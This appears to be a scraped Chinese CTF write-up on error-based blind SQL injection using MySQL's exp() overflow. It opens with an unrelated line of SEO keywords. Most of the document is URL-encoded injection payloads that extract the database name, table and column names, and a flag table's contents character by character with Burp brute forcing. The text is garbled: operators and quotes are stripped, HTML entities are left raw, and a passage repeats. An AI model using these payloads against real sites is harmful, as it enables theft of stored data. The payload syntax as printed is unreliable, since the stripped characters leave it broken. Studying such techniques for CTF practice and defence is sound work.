网站建设开发公司报价,ssp媒体服怎样做网站,用dw做网站 主题是哪个,支付网站备案整数范围
最大整数 exp 函数介绍 报错盲注注入
payload分析 709C-ASCII 值就等于我们下面的 7091-1 #xff0c;C就是我们要猜的值#xff0c;当我们猜测的值和ASCII码相等时#xff0c;那么exp就不会出现报错#xff0c;因为1-1还是等于709#xff1a;
练习
id1 an…整数范围
最大整数 exp 函数介绍 报错盲注注入
payload分析 709C-ASCII 值就等于我们下面的 7091-1 C就是我们要猜的值当我们猜测的值和ASCII码相等时那么exp就不会出现报错因为1-1还是等于709
练习
id1 and 11%23 返回hello,admin
id1 and 11%23 返回数据库操作错误通过上面测试这是一个数字型注入的题目我们直接用下面的payload
猜测数据库名的长度
id1 and exp(709%2b4-length(database()))%23我们看到上面payload里的709%2b4%23是加号的意思这里的意思是7094那么为什么要把号编码呢因为在burp里号会被认为是空格所以需要url编码来编码一下我们来发包 这里提示数据库操作错误因为我们这里的猜测是值是4出现报错说明我们后面的数据库长度没有四位因为根据我们的exp(709)大于709会报错的特性那么数据库长度必然小于4不然的话不会出现报错这里我们使用burp的爆破模块来猜测长度在C的位置打上标记 这里我们是从大到小猜的 我们观察发现474为错误信息4和3之间有个转折点从原本报错的4变成3后正常了那么说明我们数据库的长度为3: 下面我们开始猜测数据库名
猜测数据库名
id1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23直接在C打上标记 因为exp的特性所以我们需要从大到小开始猜测ASCII码的可见范围是32~127那么我们就从127开始猜测 我们找到报错和正常的转折点的数字119就是我们所需要的正确的ASCII第二位第三位都是同理
猜表名的长度
id1 and exp(709%2b9-(select length(group_concat(table_name)) from information_schema.tables where table_schemadatabase()))%23猜表名的代码里和上次讲的盲注代码类似变动的地方是exp函数我们需要猜测的地方是9的位置同样爆破9的位置表名通常不会很大我们只需要在1~10范围内猜测大概率就可以拿到长度其他的payload如下方法都是类似用burp标记后爆破就可以得出结果
测试注入点
id1 and 11%23 返回hello,admin
id1 and 11%23 返回数据库操作错误猜测数据库名的长度
id1 and exp(709%2b4-length(database()))%23猜测数据库名
id1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23猜表名
id1 and exp(709%2b103-ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1)))%23猜列名长度
id1 and exp(709%2b4-(select length(group_concat(column_name)) from information_schema.columns where table_nameflag))%23猜列名
id1 and exp(709%2b102-ascii(substr((select group_concat(column_name) from information_schema.columns where table_nameflag),1,1)))%23猜数据长度
id1 and exp(709%2b38-(select length(flag) from flag))%23猜数据
id1 and exp(709%2b102-ascii(substr((select flag from flag),1,1)))%23
